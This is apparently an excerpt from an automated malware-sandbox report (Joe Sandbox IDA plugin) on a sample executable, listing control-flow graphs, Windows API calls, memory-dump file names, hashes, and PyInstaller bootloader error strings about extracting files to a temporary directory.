                                                                                                                                                                                                                                                                                                                        control_flow_graph 409 7ff6ba3a1600-7ff6ba3a1611 410 7ff6ba3a1613-7ff6ba3a161c call 7ff6ba3a1050 409->410 411 7ff6ba3a1637-7ff6ba3a1651 call 7ff6ba3a45c0 409->411 418 7ff6ba3a162e-7ff6ba3a1636 410->418 419 7ff6ba3a161e-7ff6ba3a1629 call 7ff6ba3a2710 410->419 416 7ff6ba3a1653-7ff6ba3a1681 call 7ff6ba3b4f08 call 7ff6ba3a2910 411->416 417 7ff6ba3a1682-7ff6ba3a169c call 7ff6ba3a45c0 411->417 426 7ff6ba3a169e-7ff6ba3a16b3 call 7ff6ba3a2710 417->426 427 7ff6ba3a16b8-7ff6ba3a16cf call 7ff6ba3b06d4 417->427 419->418 435 7ff6ba3a1821-7ff6ba3a1824 call 7ff6ba3b004c 426->435 433 7ff6ba3a16d1-7ff6ba3a16f4 call 7ff6ba3b4f08 call 7ff6ba3a2910 427->433 434 7ff6ba3a16f9-7ff6ba3a16fd 427->434 448 7ff6ba3a1819-7ff6ba3a181c call 7ff6ba3b004c 433->448 437 7ff6ba3a16ff-7ff6ba3a170b call 7ff6ba3a1210 434->437 438 7ff6ba3a1717-7ff6ba3a1737 call 7ff6ba3b4f44 434->438 443 7ff6ba3a1829-7ff6ba3a183b 435->443 445 7ff6ba3a1710-7ff6ba3a1712 437->445 449 7ff6ba3a1761-7ff6ba3a176c 438->449 450 7ff6ba3a1739-7ff6ba3a175c call 7ff6ba3b4f08 call 7ff6ba3a2910 438->450 445->448 448->435 451 7ff6ba3a1802-7ff6ba3a180a call 7ff6ba3b4f30 449->451 452 7ff6ba3a1772-7ff6ba3a1777 449->452 463 7ff6ba3a180f-7ff6ba3a1814 450->463 451->463 455 7ff6ba3a1780-7ff6ba3a17a2 call 7ff6ba3b039c 452->455 464 7ff6ba3a17a4-7ff6ba3a17bc call 7ff6ba3b0adc 455->464 465 7ff6ba3a17da-7ff6ba3a17e6 call 7ff6ba3b4f08 455->465 463->448 471 7ff6ba3a17be-7ff6ba3a17c1 464->471 472 7ff6ba3a17c5-7ff6ba3a17d8 call 7ff6ba3b4f08 464->472 470 7ff6ba3a17ed-7ff6ba3a17f8 call 7ff6ba3a2910 465->470 477 7ff6ba3a17fd 470->477 471->455 474 7ff6ba3a17c3 471->474 472->470 474->477 477->451
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
                                                                                                                                                                                                                                                                                                                        • Instruction ID: dd905067492a88bd85427228c1cedd38a612935110789a2ef753ec50ea3772f5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6451B021B08B6792EE109B59D8401BD6392BF80794F8446B2EF0CC77E6EF3CE5958300

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A8704
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A870A
                                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A874C
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8830: GetEnvironmentVariableW.KERNEL32(00007FF6BA3A388E), ref: 00007FF6BA3A8867
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6BA3A8889
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3B8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B8251
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 61b2a6dd6bf71dfa59745e520b0f1c7072ed433f21a655892ed23786ae15a234
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97417021A19A6244FE50AB6DE8552BD2296AF847C0F8441B2EF0DC77DAEE3CE605C340

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 601 7ff6ba3a1210-7ff6ba3a126d call 7ff6ba3abd80 604 7ff6ba3a126f-7ff6ba3a1296 call 7ff6ba3a2710 601->604 605 7ff6ba3a1297-7ff6ba3a12af call 7ff6ba3b4f44 601->605 610 7ff6ba3a12b1-7ff6ba3a12cf call 7ff6ba3b4f08 call 7ff6ba3a2910 605->610 611 7ff6ba3a12d4-7ff6ba3a12e4 call 7ff6ba3b4f44 605->611 624 7ff6ba3a1439-7ff6ba3a144e call 7ff6ba3aba60 call 7ff6ba3b4f30 * 2 610->624 617 7ff6ba3a12e6-7ff6ba3a1304 call 7ff6ba3b4f08 call 7ff6ba3a2910 611->617 618 7ff6ba3a1309-7ff6ba3a131b 611->618 617->624 620 7ff6ba3a1320-7ff6ba3a1345 call 7ff6ba3b039c 618->620 630 7ff6ba3a1431 620->630 631 7ff6ba3a134b-7ff6ba3a1355 call 7ff6ba3b0110 620->631 638 7ff6ba3a1453-7ff6ba3a146d 624->638 630->624 631->630 637 7ff6ba3a135b-7ff6ba3a1367 631->637 639 7ff6ba3a1370-7ff6ba3a1398 call 7ff6ba3aa1c0 637->639 642 7ff6ba3a1416-7ff6ba3a142c call 7ff6ba3a2710 639->642 643 7ff6ba3a139a-7ff6ba3a139d 639->643 642->630 644 7ff6ba3a139f-7ff6ba3a13a9 643->644 645 7ff6ba3a1411 643->645 647 7ff6ba3a13d4-7ff6ba3a13d7 644->647 648 7ff6ba3a13ab-7ff6ba3a13b9 call 7ff6ba3b0adc 644->648 645->642 650 7ff6ba3a13d9-7ff6ba3a13e7 call 7ff6ba3c9e30 647->650 651 7ff6ba3a13ea-7ff6ba3a13ef 647->651 652 7ff6ba3a13be-7ff6ba3a13c1 648->652 650->651 651->639 654 7ff6ba3a13f5-7ff6ba3a13f8 651->654 655 7ff6ba3a13cf-7ff6ba3a13d2 652->655 656 7ff6ba3a13c3-7ff6ba3a13cd call 7ff6ba3b0110 652->656 658 7ff6ba3a13fa-7ff6ba3a13fd 654->658 659 7ff6ba3a140c-7ff6ba3a140f 654->659 655->642 656->651 656->655 658->642 661 7ff6ba3a13ff-7ff6ba3a1407 658->661 659->630 661->620
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e7e218bea623bde61708f427b7fcd7b4368cbd96e1b0d49f00024d598f8a602f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5551E322A08A6681EE60AF19E4503BE6292FF85794F844276EF4DC7BD5EF3CE541C700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,-00000018,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE8C
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,-00000018,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE98
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2401af859a48643a1efddb18fd409e2d207b16f6385c28e8799082d3e391b860
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B241C422B19B1291EA16CB1EAC005796396BF49B90F988679DF1EC7784EF3CE445D300

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36E1
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36EB
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2C50: MessageBoxW.USER32 ref: 00007FF6BA3A2D99
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4fd1f0c6bb6e1feb03afd2ae079dcc5f2a362c457a86b5d1be680f9e0324aeb2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12218161F1866291FE209B28EC513BE6256BF88394F8442B2EF5EC65E5FE2DE505C700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 746 7ff6ba3bba5c-7ff6ba3bba82 747 7ff6ba3bba84-7ff6ba3bba98 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 746->747 748 7ff6ba3bba9d-7ff6ba3bbaa1 746->748 762 7ff6ba3bbe8e 747->762 750 7ff6ba3bbe77-7ff6ba3bbe83 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 748->750 751 7ff6ba3bbaa7-7ff6ba3bbaae 748->751 769 7ff6ba3bbe89 call 7ff6ba3ba8e0 750->769 751->750 753 7ff6ba3bbab4-7ff6ba3bbae2 751->753 753->750 756 7ff6ba3bbae8-7ff6ba3bbaef 753->756 759 7ff6ba3bbaf1-7ff6ba3bbb03 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 756->759 760 7ff6ba3bbb08-7ff6ba3bbb0b 756->760 759->769 765 7ff6ba3bbb11-7ff6ba3bbb17 760->765 766 7ff6ba3bbe73-7ff6ba3bbe75 760->766 767 7ff6ba3bbe91-7ff6ba3bbea8 762->767 765->766 770 7ff6ba3bbb1d-7ff6ba3bbb20 765->770 766->767 769->762 770->759 771 7ff6ba3bbb22-7ff6ba3bbb47 770->771 774 7ff6ba3bbb49-7ff6ba3bbb4b 771->774 775 7ff6ba3bbb7a-7ff6ba3bbb81 771->775 777 7ff6ba3bbb72-7ff6ba3bbb78 774->777 778 7ff6ba3bbb4d-7ff6ba3bbb54 774->778 779 7ff6ba3bbb83-7ff6ba3bbbab call 7ff6ba3bd5fc call 7ff6ba3ba948 * 2 775->779 780 7ff6ba3bbb56-7ff6ba3bbb6d call 7ff6ba3b4ee8 call 7ff6ba3b4f08 call 7ff6ba3ba8e0 775->780 782 7ff6ba3bbbf8-7ff6ba3bbc0f 777->782 778->777 778->780 807 7ff6ba3bbbc8-7ff6ba3bbbf3 call 7ff6ba3bc284 779->807 808 7ff6ba3bbbad-7ff6ba3bbbc3 call 7ff6ba3b4f08 call 7ff6ba3b4ee8 779->808 811 7ff6ba3bbd00 780->811 785 7ff6ba3bbc11-7ff6ba3bbc19 782->785 786 7ff6ba3bbc8a-7ff6ba3bbc94 call 7ff6ba3c391c 782->786 785->786 790 7ff6ba3bbc1b-7ff6ba3bbc1d 785->790 798 7ff6ba3bbd1e 786->798 799 7ff6ba3bbc9a-7ff6ba3bbcaf 786->799 790->786 795 7ff6ba3bbc1f-7ff6ba3bbc35 790->795 795->786 800 7ff6ba3bbc37-7ff6ba3bbc43 795->800 803 7ff6ba3bbd23-7ff6ba3bbd43 ReadFile 798->803 799->798 805 7ff6ba3bbcb1-7ff6ba3bbcc3 GetConsoleMode 799->805 800->786 801 7ff6ba3bbc45-7ff6ba3bbc47 800->801 801->786 806 7ff6ba3bbc49-7ff6ba3bbc61 801->806 809 7ff6ba3bbd49-7ff6ba3bbd51 803->809 810 7ff6ba3bbe3d-7ff6ba3bbe46 GetLastError 803->810 805->798 812 7ff6ba3bbcc5-7ff6ba3bbccd 805->812 806->786 814 7ff6ba3bbc63-7ff6ba3bbc6f 806->814 807->782 808->811 809->810 816 7ff6ba3bbd57 809->816 819 7ff6ba3bbe63-7ff6ba3bbe66 810->819 820 7ff6ba3bbe48-7ff6ba3bbe5e call 7ff6ba3b4f08 call 7ff6ba3b4ee8 810->820 813 7ff6ba3bbd03-7ff6ba3bbd0d call 7ff6ba3ba948 811->813 812->803 818 7ff6ba3bbccf-7ff6ba3bbcf1 ReadConsoleW 812->818 813->767 814->786 822 7ff6ba3bbc71-7ff6ba3bbc73 814->822 826 7ff6ba3bbd5e-7ff6ba3bbd73 816->826 828 7ff6ba3bbcf3 GetLastError 818->828 829 7ff6ba3bbd12-7ff6ba3bbd1c 818->829 823 7ff6ba3bbcf9-7ff6ba3bbcfb call 7ff6ba3b4e7c 819->823 824 7ff6ba3bbe6c-7ff6ba3bbe6e 819->824 820->811 822->786 833 7ff6ba3bbc75-7ff6ba3bbc85 822->833 823->811 824->813 826->813 835 7ff6ba3bbd75-7ff6ba3bbd80 826->835 828->823 829->826 833->786 839 7ff6ba3bbd82-7ff6ba3bbd9b call 7ff6ba3bb674 835->839 840 7ff6ba3bbda7-7ff6ba3bbdaf 835->840 846 7ff6ba3bbda0-7ff6ba3bbda2 839->846 843 7ff6ba3bbdb1-7ff6ba3bbdc3 840->843 844 7ff6ba3bbe2b-7ff6ba3bbe38 call 7ff6ba3bb4b4 840->844 847 7ff6ba3bbe1e-7ff6ba3bbe26 843->847 848 7ff6ba3bbdc5 843->848 844->846 846->813 847->813 849 7ff6ba3bbdca-7ff6ba3bbdd1 848->849 851 7ff6ba3bbdd3-7ff6ba3bbdd7 849->851 852 7ff6ba3bbe0d-7ff6ba3bbe18 849->852 853 7ff6ba3bbdf3 851->853 854 7ff6ba3bbdd9-7ff6ba3bbde0 851->854 852->847 856 7ff6ba3bbdf9-7ff6ba3bbe09 853->856 854->853 855 7ff6ba3bbde2-7ff6ba3bbde6 854->855 855->853 857 7ff6ba3bbde8-7ff6ba3bbdf1 855->857 856->849 858 7ff6ba3bbe0b 856->858 857->856 858->847
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 498042b8bade30e16a632e5d5190c2e48e6397d1dbcd995b40cfaaf51afd2612
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83C1BE22A0CF8692EA609F1995402BD7B96FB81B80FD543B5EF4EC7791CE7CE8458700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a1a13a9c21bb540d1afd7dfa216c21187366486237ffc4c511fbdf12f5af6df1
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F212C31A0CB5242EA509B59F94422EA7A5FF857A0F504275EF6DC3BE8EF7CD4458B00

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetCurrentProcess.KERNEL32 ref: 00007FF6BA3A8590
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: OpenProcessToken.ADVAPI32 ref: 00007FF6BA3A85A3
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetTokenInformation.KERNELBASE ref: 00007FF6BA3A85C8
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetLastError.KERNEL32 ref: 00007FF6BA3A85D2
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetTokenInformation.KERNELBASE ref: 00007FF6BA3A8612
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6BA3A862E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: CloseHandle.KERNEL32 ref: 00007FF6BA3A8646
                                                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A916C
